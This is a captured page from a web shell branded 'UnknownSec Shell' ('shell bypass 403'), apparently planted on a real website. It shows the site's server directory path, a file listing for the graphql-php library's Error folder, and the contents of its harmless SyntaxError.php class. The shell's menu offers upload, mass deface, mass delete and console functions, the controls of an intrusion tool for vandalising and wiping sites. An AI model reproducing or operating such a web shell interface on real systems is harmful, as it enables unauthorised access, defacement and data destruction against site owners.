shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
webonyx
/
graphql-php
/
src
/
Error
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
SyntaxError.php
<?php declare(strict_types=1); namespace GraphQL\Error; use GraphQL\Language\Source; class SyntaxError extends Error { public function __construct(Source $source, int $position, string $description) { parent::__construct( "Syntax Error: {$description}", null, $source, [$position] ); } }
© 2026 UnknownSec